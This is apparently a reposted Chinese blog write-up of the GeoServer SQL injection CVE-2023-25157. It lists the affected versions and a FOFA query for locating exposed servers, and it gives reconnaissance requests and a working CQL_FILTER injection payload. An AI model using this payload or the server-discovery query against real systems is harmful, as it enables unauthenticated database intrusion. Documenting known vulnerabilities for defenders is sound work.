GeoServer Sql注入漏洞(CVE-2023-25157)

admin 2024年7月8日08:23:32评论16 views字数 1309阅读4分21秒阅读模式

漏洞描述

GeoServer是一个开源的地图服务器,它是遵循OpenGIS Web服务器规范的J2EE实现,通过它可以方便的将地图数据发布为地图服务,实现地理空间数据在用户之间的共享。

在2.22.1和2.21.4之前版本中,在开放地理空间联盟(OGC)标准定义的过滤器和函数表达式中发现了一个SQL注入问题,未经身份验证的攻击者可以利用该漏洞进行SQL注入,执行恶意代码。

影响版本

    geoserver<2.18.7
    2.19.0<=geoserver<2.19.7
    2.20.0<=geoserver<2.20.7
    2.21.0<=geoserver<2.21.4
    2.22.0<=geoserver<2.22.2

网络测绘

FOFA:app="GeoServer"

GeoServer Sql注入漏洞(CVE-2023-25157)

漏洞复现
在进行注入之前,首先要获取地理图层列表信息,这是sql注入payload中的一个必要参数
/geoserver/ows?service=WFS&version=1.0.0&request=GetCapabilities

GeoServer Sql注入漏洞(CVE-2023-25157)

将上一步获取的typeName的name属性值拼接,获取图层的属性名称
/geoserver/ows?service=wfs&version=1.0.0&request=GetFeature&typeName=topp:tasmania_cities&maxFeatures=1&outputFormat=json

GeoServer Sql注入漏洞(CVE-2023-25157)

利用已知参数构造最终payload

/geoserver/ows?service=wfs&version=1.0.0&request=GetFeature&typeName=topp:tasmania_cities&CQL_FILTER=strStartsWith(CITY_NAME,%27x%27%27)%20=%20true%20and%201=(SELECT%20CAST%20((SELECT%20version())%20AS%20integer))%20–%20%27)%20=%20true

自动化工具检测

主要是利用工具自动化检测可以利用的typeName以及属性名称

GeoServer Sql注入漏洞(CVE-2023-25157)

GeoServer Sql注入漏洞(CVE-2023-25157)

🍻🍻🍻
🍻🍻🍻

“每一个不曾起舞的日子,都是对生命的辜负。”——尼采“你今天的努力,是为了铺垫未来那段无悔的岁月。”“不要因为一次挫折就放弃你原来决心要达到的目的。”“生活不会亏待一直努力的人。”“别让昨日的沮丧,毁掉了明日的美好。”“所有的胜利,与征服自己的胜利比起来,都是微不足道的。”——柏拉图“梦想是注定孤独的旅行,路上少不了质疑和嘲笑,但那又怎样?哪怕遍体鳞伤,也要活得漂亮。”“有志者,事竟成。破釜沉舟,百二秦关终属楚;苦心人,天不负,卧薪尝胆,三千越甲可吞吴。”——蒲松龄“失败乃成功之母。”“千里之行,始于足下。”——老子“不经一番寒彻骨,怎得梅花扑鼻香。”“心有多大,舞台就有多大。”“路漫漫其修远兮,吾将上下而求索。”——屈原“只要路是对的,就不怕路远。”“海纳百川,有容乃大;壁立千仞,无欲则刚。”

原文始发于微信公众号(南街老友):GeoServer Sql注入漏洞(CVE-2023-25157)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年7月8日08:23:32
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   GeoServer Sql注入漏洞(CVE-2023-25157)https://cn-sec.com/archives/2928411.html

发表评论

匿名网友 填写信息